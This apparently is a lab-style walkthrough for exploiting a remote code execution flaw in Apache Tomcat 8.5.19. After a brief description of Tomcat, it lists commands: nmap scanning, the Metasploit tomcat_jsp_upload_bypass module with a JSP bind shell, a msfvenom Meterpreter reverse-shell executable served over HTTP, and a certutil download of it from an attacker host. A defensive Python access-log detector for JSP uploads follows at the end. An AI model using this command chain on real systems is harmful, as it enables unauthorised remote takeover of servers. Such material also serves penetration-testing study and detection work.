Apache Tomcat Web Server
Apache Tomcat, or simply Tomcat Server, is a widely used free and open-source web server for running Java-based websites and applications. It allows developers to host and manage dynamic web applications built on the Java platform.
Tomcat uses the HTTP protocol to handle communication between the server and users. By default, it listens on TCP port 8080.
The Apache HTTP Server is commonly used to host static and dynamic websites, especially those built with PHP. On the other hand, Apache Tomcat is mainly used for Java-based web applications.
Apache Tomcat v8.5.19 has a remote code execution (RCE) vulnerability that allows attackers to upload and run a malicious JSP payload, giving them remote access to the target server. Metasploit (MSF) has a ready-made exploit module that can be used to take advantage of this weakness and gain control over the system.
nmap -sS -sV -O [IP]
msfconsole -q
setg RHOSTS [IP]
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
show options
set payload java/jsp_shell_bind_tcp
set SHELL cmd
exploit
sessions
# search shell_to_meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -f exe > meterpreter.exe
sudo python -m SimpleHTTPServer 80
sessions 1
certutil -urlcache -f [ATTACKIP]/meterpreter.exe meterpreter.exe
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [ATTACK IP]
set LPORT [PORT]
run
.\meterpreter.exe
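Seen from the server side, the JSP upload described above leaves a trace in Tomcat's access log: the module writes the file with an HTTP PUT, then requests it. The following detection sketch is an added example, not part of the original notes; it assumes the AccessLogValve "common" pattern, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Match the extension anywhere in the path, not only at the end, so that
# characters appended after it do not hide the request from this check.
JSP = re.compile(r'^(.*?\.jspx?)', re.IGNORECASE)

def jsp_target(raw_path):
    """Return the normalised JSP path a request refers to, or None."""
    path = unquote(raw_path.split("?", 1)[0])
    m = JSP.match(path)
    return m.group(1).lower() if m else None

def find_jsp_uploads(lines):
    """Flag successful PUTs of JSP files and later hits on the same file."""
    uploaded = {}   # normalised path -> client that wrote it
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line.strip())
        if not m:
            continue  # not in the assumed log format
        client, method, raw_path, status = m.groups()
        target = jsp_target(raw_path)
        if target is None:
            continue
        ok = status.startswith("2")
        if method.upper() == "PUT" and ok:
            uploaded[target] = client
            findings.append((n, "jsp-write", client, target))
        elif target in uploaded and ok:
            findings.append((n, "uploaded-jsp-requested", client, target))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 11230',
    '198.51.100.7 - - [12/Mar/2024:10:01:09 +0000] "PUT /notes.txt HTTP/1.1" 201 -',
    '203.0.113.9 - - [12/Mar/2024:10:02:10 +0000] "PUT /probe.jsp HTTP/1.1" 403 -',
    '203.0.113.9 - - [12/Mar/2024:10:02:11 +0000] "PUT /probe.jsp HTTP/1.1" 201 -',
    '203.0.113.9 - - [12/Mar/2024:10:02:12 +0000] "GET /probe.jsp HTTP/1.1" 200 64',
    'this line is not an access log entry',
]

if __name__ == "__main__":
    for finding in find_jsp_uploads(SAMPLE):
        print(finding)
```

A successful PUT of any `.jsp` file on a production Tomcat is worth an alert on its own; the default servlet only accepts writes when its `readonly` init-param has been set to `false`.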